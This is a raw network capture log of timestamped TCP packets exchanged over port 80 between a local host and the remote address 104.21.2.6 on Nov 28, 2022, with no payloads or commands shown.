Nov 28, 2022 16:37:03.760876894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.760895014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.760910988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.760926962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.760946035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.760962009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.760978937 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.760994911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761105061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761111021 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.761111021 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.761140108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761157036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761173964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761223078 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761240005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761276007 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.761276007 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.761282921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761285067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761302948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761318922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761334896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761349916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761365891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761382103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761445045 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.761445045 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.761460066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.761775017 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.761811018 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.761951923 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762109995 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762115002 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.762150049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762185097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762208939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762238026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762267113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762295008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762325048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762331009 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.762331009 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.762377024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762404919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762434959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762466908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.762542009 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.762542009 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.762715101 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.763057947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763099909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763134956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763248920 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.763304949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763322115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763336897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763351917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763369083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763385057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763397932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.763418913 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.763592005 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.776225090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776283979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776340008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776355982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776381016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776408911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776437044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776453972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776468992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776527882 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.776527882 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.776566029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776582956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776597977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776621103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776735067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.776735067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.776777983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776808977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776866913 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.776894093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776909113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776922941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776937962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776957989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.776983976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777009964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777038097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777040958 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.777040958 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.777062893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777206898 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.777206898 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.777250051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777264118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777378082 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.777559996 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.777740955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777847052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777867079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777883053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777898073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777914047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777916908 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.777937889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777964115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777983904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.777998924 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778012991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778027058 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778042078 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778127909 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.778283119 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.778592110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778752089 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.778851032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778872013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778887987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778903008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778918982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778934956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778949976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778965950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778981924 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.778997898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779014111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779030085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779257059 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.779257059 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.779489040 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.779692888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779721022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779736996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779752016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779768944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779783964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779864073 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.779970884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.779993057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.780009031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.780025005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.780040979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.780056953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.780071020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.780148983 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.780320883 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.780320883 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.785259008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785482883 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.785536051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785550117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785573959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785594940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785618067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785640955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785661936 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785686016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785707951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785734892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785761118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785792112 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.785944939 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.785944939 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.785995960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786019087 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786041975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786063910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786087036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786113024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786118031 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.786118031 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.786149979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786175013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786200047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786220074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786242962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786264896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786282063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.786282063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.786297083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786478043 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.786650896 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.786705017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.786921024 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.787004948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787029982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787050962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787067890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787081003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787094116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787106991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787120104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787132025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787144899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787157059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787168980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.787223101 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.787240982 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.787410975 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.811640978 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.811820030 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.811901093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.811914921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.811929941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.811942101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.811954021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.811965942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.811976910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.811989069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812000990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812011957 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812024117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812035084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812047005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812114000 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.812309027 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.812309027 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.812344074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812362909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812374115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812386036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812397003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812407970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812417984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812434912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812457085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812478065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812493086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812503099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812647104 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.812695980 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.812906981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812917948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.812933922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813097000 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.813199043 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813211918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813221931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813232899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813235998 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.813250065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813261032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813271999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813282013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813293934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813313961 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813328028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.813407898 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.813455105 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.813625097 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.813994884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814007998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814026117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814043999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814063072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814084053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814100027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814111948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814122915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814135075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814146042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814157963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814229965 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.814284086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814305067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814403057 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.814403057 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.814572096 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.814728975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814861059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814874887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814887047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814910889 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.814929008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814941883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814953089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814966917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.814979076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815005064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815018892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815037012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815056086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815074921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815180063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.815180063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.815349102 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.815654039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815752029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815799952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815825939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815844059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815867901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815896988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815908909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815921068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815932989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815944910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815956116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815968037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.815979004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.816029072 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.816029072 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.816199064 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.816368103 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.816576958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.816695929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.816721916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.816771030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.816793919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.816878080 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.817218065 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.823834896 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.828516006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828654051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828674078 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828695059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828715086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828732967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828743935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828754902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828766108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828777075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828788042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828799009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828809023 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828819990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828830957 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828841925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.828895092 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.828895092 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.828895092 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.828942060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829066038 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.829106092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829128027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829142094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829153061 CET	80	49830	104.21.2.6	192.168.11.20
